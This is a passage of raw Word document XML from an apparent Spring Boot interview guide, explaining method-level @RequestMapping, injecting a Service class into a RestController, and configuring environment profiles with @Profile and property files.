    </w:p>
    <w:p w14:paraId="6AC12D8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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FFD5F4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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063DE81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tMapping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FFD690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eMapping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B35E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nnotations are more specific and serve as shorthand for @RequestMapping with the corresponding HTTP method type.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E718BBD" w14:textId="5870A4B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613" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D8AF95" w14:textId="0C113CA4" w:rsidR="007D2E6B" w:rsidRPr="00CE4B95" w:rsidRDefault="008019C5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="632" w:name="_Toc197867846"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What will happen if I use @RequestMapping at method level</w:t>
      </w:r>
      <w:r w:rsidR="007D2E6B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="632"/>
    </w:p>
    <w:p w14:paraId="7C4E59BC" w14:textId="6C4762F5"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use @RequestMapping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of Using @RequestMapping at Method Level:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C20F0E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 Mapping:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C6BADD"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ndpoint for that specific method, defining what URL path it should respond to.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50FB8E52"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can be used to define the HTTP request URL, query parameters, headers, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8FB8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 Type:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D94C9E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the HTTP method type for the request using the method attribute, such as RequestMethod.GET, RequestMethod.POST, RequestMethod.PUT, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00117996"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no HTTP method is specified, it will accept all HTTP methods by default.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39720F7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 Handling:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C8F76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maps incoming requests to specific controller methods, which are responsible for processing the request and sending the response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C79BA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Handling for Each Request:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BAB5E3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provides fine-grained control over the mapping of a specific HTTP request to a controller method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38492F5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RequestMapping at Method Level:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA985D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47FE7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39DF84B7" w14:textId="77777777" w:rsidR="00C6790E" w:rsidRPr="002C6305" w:rsidRDefault="00C6790E" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EF33B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642DEC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50CA04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710E913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6E653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D17C80E" w14:textId="77777777" w:rsidR="00C6790E" w:rsidRPr="002C6305" w:rsidRDefault="00C6790E" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7462BBA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AC66F4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9A6EC3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13C232B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1C203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63B47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0F680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at Happens in the Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3017188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will handle GET requests to /api/hello and return a message "Hello, World!".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0115E0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ubmitData()</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> method will handle POST requests to /api/submit, and the data from the request body will be processed and returned.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3FF0E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y Use @RequestMapping at Method Level?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130922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ping Specific Methods:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="608A4009"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lows you to map different HTTP methods (GET, POST, PUT, DELETE, etc.) to different methods within the same controller class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C780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Specification:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9493F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 easy to manage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20FCD0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e-Grained Control:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD7CF0A"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vides flexibility in defining request parameters, headers, and the HTTP method type (GET, POST, PUT, DELETE) on a per-method basis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2E74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bination with Class-Level Annotations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4046585E"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You can use @RequestMapping at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to specify a common base path, then fine-tune specific method-level mappings for different endpoints within that class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B8E16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Class-Level @RequestMapping:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00ABB1F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55D7152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3752D9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0076823F" w14:textId="77777777" w:rsidR="00C6790E" w:rsidRPr="002C6305" w:rsidRDefault="00C6790E" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D6F52A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12C37BA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706AD16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4CF0A7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4769CF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46A697" w14:textId="77777777" w:rsidR="00C6790E" w:rsidRPr="002C6305" w:rsidRDefault="00C6790E" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E71D8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08E8A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7743B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4119A2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0F6B2B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7B8E0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05158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ult:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661804E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pi/hello</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> will invoke sayHello().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42820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api/submit</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> will invoke submitData().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118697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using @RequestMapping at the method level allows you to control the HTTP method type, URL pattern, and other request-related parameters for each specific controller method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507CD9C9" w14:textId="210B01F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614" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B32B054" w14:textId="33EF8E32" w:rsidR="007D2E6B" w:rsidRPr="00CE4B95" w:rsidRDefault="008019C5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="633" w:name="_Toc197867847"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How to map Service class to RestController</w:t>
      </w:r>
      <w:r w:rsidR="007D2E6B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="633"/>
    </w:p>
    <w:p w14:paraId="7735860E" w14:textId="140CBE64" w:rsidR="004879E2" w:rsidRPr="002C6305" w:rsidRDefault="004879E2"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you typically map a </w:t>
      </w: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xml:space="preserve"> class to a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a step-by-step guide on how to map a Service class to a @RestController:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441035B3"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the Service Class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE8E99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class contains the business logic of your application. It is typically annotated with @Service and can have methods that perform specific operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5656B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6148A269" w14:textId="77777777" w:rsidR="004879E2" w:rsidRPr="002C6305" w:rsidRDefault="004879E2" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A8B756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322DEE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3BCE4DDD" w14:textId="77777777" w:rsidR="004879E2" w:rsidRPr="002C6305" w:rsidRDefault="004879E2" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="748DDA1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00F5B20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n a real application, this would fetch data from the database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CBA82A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A32A2D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9E38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FC6FA4"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RestController Class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A53AF7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lass will be annotated with @RestController and will use the service class to perform operations. It will also handle HTTP requests and map them to service methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277FF7C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35124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0AF5C7D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120151D0"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57AC5AF3" w14:textId="77777777" w:rsidR="004879E2" w:rsidRPr="002C6305" w:rsidRDefault="004879E2" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A29F39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671F2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5C82E025" w14:textId="77777777" w:rsidR="004879E2" w:rsidRPr="002C6305" w:rsidRDefault="004879E2" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23DDD34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FFFB4A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rivate EmployeeService employeeService; // Injecting the Service class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC1F3F5" w14:textId="77777777" w:rsidR="004879E2" w:rsidRPr="002C6305" w:rsidRDefault="004879E2" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EB8EBE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3FA87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02F582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235629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B75E4E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DC72E7"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ow It Works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0830C5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annotation tells Spring to treat the class as a REST API controller.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521E918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Autowired</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> annotation automatically injects an instance of the EmployeeService into the EmployeeController.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C1551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annotation maps the GET /employee/{id} HTTP request to the getEmployee() method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08EA088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getEmployeeDetails() from the service class is called to process the business logic and return the response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1557083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unning the Application:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E36E5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run the application, the controller will be available at the specified endpoint (/employee/{id}). For example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0CCE3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employee/1</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> will return Employee details for ID: 1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C4F8F7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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434065C8"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rvice Class (EmployeeService.java):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188D8C7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0953614B" w14:textId="77777777" w:rsidR="004879E2" w:rsidRPr="002C6305" w:rsidRDefault="004879E2" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EC8317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11E9D6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E89B6A9" w14:textId="77777777" w:rsidR="004879E2" w:rsidRPr="002C6305" w:rsidRDefault="004879E2" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1431525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4331222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or an employee</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF936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9B0570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07CA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F97FA9"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troller Class (EmployeeController.java):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A36FC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D04090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2EDAFBF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2200922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AF32208" w14:textId="77777777" w:rsidR="004879E2" w:rsidRPr="002C6305" w:rsidRDefault="004879E2" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C6D54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9429F2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0BDFA6F5" w14:textId="77777777" w:rsidR="004879E2" w:rsidRPr="002C6305" w:rsidRDefault="004879E2" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E14C31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D8E45F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761FF0EB" w14:textId="77777777" w:rsidR="004879E2" w:rsidRPr="002C6305" w:rsidRDefault="004879E2" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="426A6AC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8FDEA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55DEF5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6FB365F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05BCFF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46B7CF"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D06620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class</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> contains the business logic and is annotated with @Service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08EC959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 class</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is annotated with @RestController and uses the service class to perform business operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7734A2C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inject the service class into the controller class using @Autowired and call its methods inside the controller's endpoints.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3955274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helps separate concerns, with the controller focusing on HTTP request handling and the service class containing the actual business logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35220AF1" w14:textId="14B766E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615" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="59180C58" w14:textId="30E010A3" w:rsidR="007D2E6B" w:rsidRPr="00CE4B95" w:rsidRDefault="008019C5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="634" w:name="_Toc197867848"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>What are Profiles in Spring boot</w:t>
      </w:r>
      <w:r w:rsidR="007D2E6B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="634"/>
    </w:p>
    <w:p w14:paraId="1E91AA9D" w14:textId="4A3CF97A"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Profiles in Spring Boot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DDF048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specific configurations</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You can define beans and properties that are specific to a particular environment (e.g., dev, prod, test).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FBE5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lective activation</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You can activate specific profiles during application startup, and Spring Boot will only load the beans and properties that belong to the active profile(s).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3339BE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ernal configuration management</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Profiles allow you to externalize your configurations (e.g., using application property files for each environment).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49431C2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Define and Use Profiles in Spring Boot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9C95C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Profiles in application.properties or application.yml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482BE7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file-specific configuration in different application.properties or application.yml files for each environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574FFC3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328CA30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 (for the development profile)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585708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 (for the production profile)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DED0E5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 (for the testing profile)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A4C91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dev.properties:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566FF5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03B01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user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12BF35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password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C811B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prod.properties:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10115EE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prod_db</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05727D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user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="144404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password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107C5D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ctivate Profiles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E14D90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in multiple ways:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D5900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 Through the Command Line (when running the application)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C03D4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dev</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A0C8D9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 In application.properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA1D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246C89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 In application.yml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50894B8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3E224BC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44C13E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448D32B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Using @Profile Annotation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E014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you can use the @Profile annotation to specify that a particular bean should only be loaded for a specific profile.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7630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32F50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5923B8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4A6D8E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680BA09D" w14:textId="77777777" w:rsidR="00970969" w:rsidRPr="002C6305" w:rsidRDefault="00970969" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="211DA0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8B42B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02FD25F5" w14:textId="77777777" w:rsidR="00970969" w:rsidRPr="002C6305" w:rsidRDefault="00970969" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44A5D6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292CB7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dev")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3388B75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evDataSource() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EEE58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dev_db");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C6F7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0A3105" w14:textId="77777777" w:rsidR="00970969" w:rsidRPr="002C6305" w:rsidRDefault="00970969" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="560763C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ean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="748CD1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prod")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595276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prodDataSource() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA9954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prod_db");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43CF9D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E1D9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97458F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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F869D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evDataSource bean is created only if the active profile is dev.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A543A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DataSource bean is created only if the active profile is prod.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5B9AC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Profile with Component Scanning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314E54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Profile with Spring components, such as @Component, @Service, or @Repository, to define profile-specific beans.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250CD5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85D997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9D46FC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25D1C6BE" w14:textId="77777777" w:rsidR="00970969" w:rsidRPr="002C6305" w:rsidRDefault="00970969" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BC2347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464E54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0DBD638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DatabaseService implements DatabaseService {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="359F565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CBFC8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246D7E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Dev Database");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1790EBB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AF81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F9AAED" w14:textId="77777777" w:rsidR="00970969" w:rsidRPr="002C6305" w:rsidRDefault="00970969" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="451F1B1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5E34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1A07ED6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DatabaseService implements DatabaseService {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2BFE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BC042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79C9C9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Production Database");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3B5C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95DF4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6A018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ccessing Profile-Specific Properties in Java Code</w:t>
      </w:r>
    </w:p>
